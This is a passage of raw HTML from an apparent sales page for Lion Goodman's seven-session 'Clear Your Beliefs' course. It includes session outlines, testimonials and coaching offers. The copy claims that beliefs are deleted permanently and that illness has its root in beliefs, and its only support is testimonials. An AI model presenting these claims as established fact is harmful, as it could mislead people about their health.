quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 